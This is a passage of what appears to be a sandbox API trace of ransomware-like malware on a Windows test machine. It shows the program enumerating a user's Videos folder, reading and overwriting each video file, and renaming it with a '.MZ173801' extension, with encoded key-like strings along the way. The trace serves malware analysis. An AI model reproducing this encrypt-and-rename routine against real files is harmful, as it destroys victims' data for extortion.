lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.508] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xa02c, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xa02c, lpOverlapped=0x0) returned 1 [0119.508] CloseHandle (hObject=0x3d0) returned 1 [0119.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\p6BEEl6x9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\p6beel6x9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.510] WriteFile (in: hFile=0x3d0, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xa02c, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f6f0*=0xa02c, lpOverlapped=0x0) returned 1 [0119.512] CloseHandle (hObject=0x3d0) returned 1 [0119.513] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\p6BEEl6x9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\p6beel6x9.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\p6BEEl6x9.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\p6beel6x9.mp4.mz173801")) returned 1 [0119.514] GetCurrentThreadId () returned 0x1358 [0119.514] GetCurrentThreadId () returned 0x1358 [0119.514] GetCurrentThreadId () returned 0x1358 [0119.514] GetCurrentThreadId () returned 0x1358 [0119.514] GetCurrentThreadId () returned 0x1358 [0119.514] GetCurrentThreadId () returned 0x1358 [0119.514] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c758920, ftCreationTime.dwHighDateTime=0x1d5f05c, ftLastAccessTime.dwLowDateTime=0x6f4cf2e0, ftLastAccessTime.dwHighDateTime=0x1d5e95a, ftLastWriteTime.dwLowDateTime=0x6f4cf2e0, ftLastWriteTime.dwHighDateTime=0x1d5e95a, nFileSizeHigh=0x0, nFileSizeLow=0x3273, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="SlAAbHqUUNjskp.mkv", cAlternateFileName="SLAABH~1.MKV")) returned 1 [0119.514] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.514] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\SlAAbHqUUNjskp.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\slaabhquunjskp.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c758920, ftCreationTime.dwHighDateTime=0x1d5f05c, ftLastAccessTime.dwLowDateTime=0x6f4cf2e0, ftLastAccessTime.dwHighDateTime=0x1d5e95a, ftLastWriteTime.dwLowDateTime=0x6f4cf2e0, ftLastWriteTime.dwHighDateTime=0x1d5e95a, nFileSizeHigh=0x0, nFileSizeLow=0x3273)) returned 1 [0119.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.515] GetCurrentThreadId () returned 0x1358 [0119.515] GetCurrentThreadId () returned 0x1358 [0119.515] GetCurrentThreadId () returned 0x1358 [0119.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.516] GetCurrentThreadId () returned 0x1358 [0119.516] GetCurrentThreadId () returned 0x1358 [0119.516] GetCurrentThreadId () returned 0x1358 [0119.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\SlAAbHqUUNjskp.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\slaabhquunjskp.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.516] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0119.516] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.516] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x3273 [0119.516] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0119.516] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3273, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x3273, lpOverlapped=0x0) returned 1 [0119.517] CloseHandle (hObject=0x3d0) returned 1 [0119.517] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\SlAAbHqUUNjskp.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\slaabhquunjskp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0119.518] WriteFile (in: hFile=0x3d0, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3273, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f6f0*=0x3273, lpOverlapped=0x0) returned 1 [0119.519] CloseHandle (hObject=0x3d0) returned 1 [0119.584] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\SlAAbHqUUNjskp.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\slaabhquunjskp.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\SlAAbHqUUNjskp.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\slaabhquunjskp.mkv.mz173801")) returned 1 [0119.598] GetCurrentThreadId () returned 0x1358 [0119.599] GetCurrentThreadId () returned 0x1358 [0119.599] GetCurrentThreadId () returned 0x1358 [0119.599] GetCurrentThreadId () returned 0x1358 [0119.599] GetCurrentThreadId () returned 0x1358 [0119.599] GetCurrentThreadId () returned 0x1358 [0119.599] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xb8bf1da0, ftLastAccessTime.dwHighDateTime=0x1d5ec4c, ftLastWriteTime.dwLowDateTime=0xb8bf1da0, ftLastWriteTime.dwHighDateTime=0x1d5ec4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="uP0XF1kok-teK_dZt2-3", cAlternateFileName="UP0XF1~1")) returned 1 [0119.599] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7819bab0, ftCreationTime.dwHighDateTime=0x1d5eb54, ftLastAccessTime.dwLowDateTime=0xb8bf1da0, ftLastAccessTime.dwHighDateTime=0x1d5ec4c, ftLastWriteTime.dwLowDateTime=0xb8bf1da0, ftLastWriteTime.dwHighDateTime=0x1d5ec4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="uP0XF1kok-teK_dZt2-3", cAlternateFileName="UP0XF1~1")) returned 0 [0119.613] GetLastError () returned 0x12 [0119.613] FindClose (in: hFindFile=0xa1bce8 | out: hFindFile=0xa1bce8) returned 1 [0119.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9625550, ftCreationTime.dwHighDateTime=0x1d5ef27, ftLastAccessTime.dwLowDateTime=0xa88e1dd7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa88e1dd7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0119.617] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0119.617] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.617] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9625550, ftCreationTime.dwHighDateTime=0x1d5ef27, ftLastAccessTime.dwLowDateTime=0xa88e1dd7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa88e1dd7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0119.617] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.621] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.621] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2f2770, ftCreationTime.dwHighDateTime=0x1d5e953, ftLastAccessTime.dwLowDateTime=0xaad81370, ftLastAccessTime.dwHighDateTime=0x1d5eda2, ftLastWriteTime.dwLowDateTime=0xa85e706f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1322, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="51xMNOj.flv.MZ173801", cAlternateFileName="51XMNO~1.MZ1")) returned 1 [0119.621] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.621] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.621] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96c584e0, ftCreationTime.dwHighDateTime=0x1d5e1a8, ftLastAccessTime.dwLowDateTime=0x31f0e620, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0xa87fd17a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa06f, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="JKmlrtcd1CFx0.mp4.MZ173801", cAlternateFileName="JKMLRT~1.MZ1")) returned 1 [0119.621] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.621] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.621] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3814fd0, ftCreationTime.dwHighDateTime=0x1d5e9b8, ftLastAccessTime.dwLowDateTime=0x643eaec0, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x643eaec0, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="NVV_UxLtcOyTWBX", cAlternateFileName="NVV_UX~1")) returned 1 [0119.621] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0119.621] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0119.621] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3814fd0, ftCreationTime.dwHighDateTime=0x1d5e9b8, ftLastAccessTime.dwLowDateTime=0x643eaec0, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x643eaec0, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1baf0 [0119.621] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3814fd0, ftCreationTime.dwHighDateTime=0x1d5e9b8, ftLastAccessTime.dwLowDateTime=0x643eaec0, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x643eaec0, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0119.621] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181901e0, ftCreationTime.dwHighDateTime=0x1d5e3dc, ftLastAccessTime.dwLowDateTime=0x83b1d0c0, ftLastAccessTime.dwHighDateTime=0x1d5e338, ftLastWriteTime.dwLowDateTime=0x83b1d0c0, ftLastWriteTime.dwHighDateTime=0x1d5e338, nFileSizeHigh=0x0, nFileSizeLow=0x3373, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="5iO4NXS5B547.mp4", cAlternateFileName="5IO4NX~1.MP4")) returned 1 [0119.622] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0119.622] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\5iO4NXS5B547.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\5io4nxs5b547.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181901e0, ftCreationTime.dwHighDateTime=0x1d5e3dc, ftLastAccessTime.dwLowDateTime=0x83b1d0c0, ftLastAccessTime.dwHighDateTime=0x1d5e338, ftLastWriteTime.dwLowDateTime=0x83b1d0c0, ftLastWriteTime.dwHighDateTime=0x1d5e338, nFileSizeHigh=0x0, nFileSizeLow=0x3373)) returned 1 [0119.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5O